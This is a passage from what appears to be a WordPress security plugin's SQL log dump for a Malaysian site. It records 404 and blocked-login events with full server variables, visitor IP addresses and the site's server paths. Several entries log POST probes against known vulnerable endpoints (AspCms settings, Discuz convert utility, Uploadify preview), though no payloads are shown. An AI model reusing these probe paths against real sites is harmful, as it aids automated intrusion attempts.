(Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpvjPTT-ZZc8Zptu2B5uAAAARc\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpvjPTT-ZZc8Zptu2B5uAAAARc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.215.42\";s:11:\"REMOTE_PORT\";s:5:\"37881\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpvjPTT-ZZc8Zptu2B5uAAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569353612.6001\";s:12:\"REQUEST_TIME\";s:10:\"1569353612\";}}','notice','2019-09-24 19:33:34','2019-09-24 19:33:32',30756512,32572232,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'149.202.215.42'),(26932,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYp36xaIaq52cc-9XMKCbAAAAAE\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.139\";s:11:\"REMOTE_PORT\";s:5:\"33684\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYp36xaIaq52cc-9XMKCbAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569355755.2038\";s:12:\"REQUEST_TIME\";s:10:\"1569355755\";}}','notice','2019-09-24 20:09:16','2019-09-24 20:09:15',30759176,32570304,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'46.229.168.139'),(26933,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3298.4 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.242.226\";s:11:\"REMOTE_PORT\";s:5:\"63664\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYp8jxaIaq52cc-9XMKENgAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569356943.563\";s:12:\"REQUEST_TIME\";s:10:\"1569356943\";}}','notice','2019-09-24 20:29:05','2019-09-24 20:29:03',30815320,32635528,'https://bintara.com.my/?page_id=11',1,0,'223.206.242.226'),(26934,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYqJu3lb-cYDmeWuuufOUgAAAEc\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.83\";s:11:\"REMOTE_PORT\";s:5:\"62971\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqJu3lb-cYDmeWuuufOUgAAAEc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569360315.3296\";s:12:\"REQUEST_TIME\";s:10:\"1569360315\";}}','notice','2019-09-24 21:25:18','2019-09-24 21:25:15',31464808,33272472,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'178.156.202.83'),(26935,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYqJwSC9qkCozCNGajGnKQAAAUM\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYqJwSC9qkCozCNGajGnKQAAAUM\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.83\";s:11:\"REMOTE_PORT\";s:5:\"63971\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqJwSC9qkCozCNGajGnKQAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569360321.8689\";s:12:\"REQUEST_TIME\";s:10:\"1569360321\";}}','notice','2019-09-24 21:25:23','2019-09-24 21:25:22',31233736,33040632,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'178.156.202.83'),(26936,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.83\";s:11:\"REMOTE_PORT\";s:5:\"65176\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqJyHlb-cYDmeWuuufOYAAAAEs\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569360329.0241\";s:12:\"REQUEST_TIME\";s:10:\"1569360329\";}}','notice','2019-09-24 21:25:30','2019-09-24 21:25:29',31206776,33012288,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'178.156.202.83'),(26937,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYqJ3BaIaq52cc-9XMKLAAAAABI\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.83\";s:11:\"REMOTE_PORT\";s:5:\"49789\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqJ3BaIaq52cc-9XMKLAAAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569360348.2461\";s:12:\"REQUEST_TIME\";s:10:\"1569360348\";}}','notice','2019-09-24 21:25:49','2019-09-24 21:25:48',31073048,32880680,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'178.156.202.83'),(26938,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.242.226\";s:11:\"REMOTE_PORT\";s:5:\"40994\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqKYHlb-cYDmeWuuufOdgAAAEc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569360481.0121\";s:12:\"REQUEST_TIME\";s:10:\"1569360481\";}}','notice','2019-09-24 21:28:03','2019-09-24 21:28:01',31206784,33021304,'https://bintara.com.my/?page_id=11',1,0,'223.206.242.226'),(26939,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:68:\"Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0.2\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.242.226\";s:11:\"REMOTE_PORT\";s:5:\"55943\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqOjIhQ4pD4smMfGAT0AwAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569361548.7343\";s:12:\"REQUEST_TIME\";s:10:\"1569361548\";}}','notice','2019-09-24 21:45:50','2019-09-24 21:45:49',30813152,32631688,'https://bintara.com.my/?page_id=18',1,0,'223.206.242.226'),(26940,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:111:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 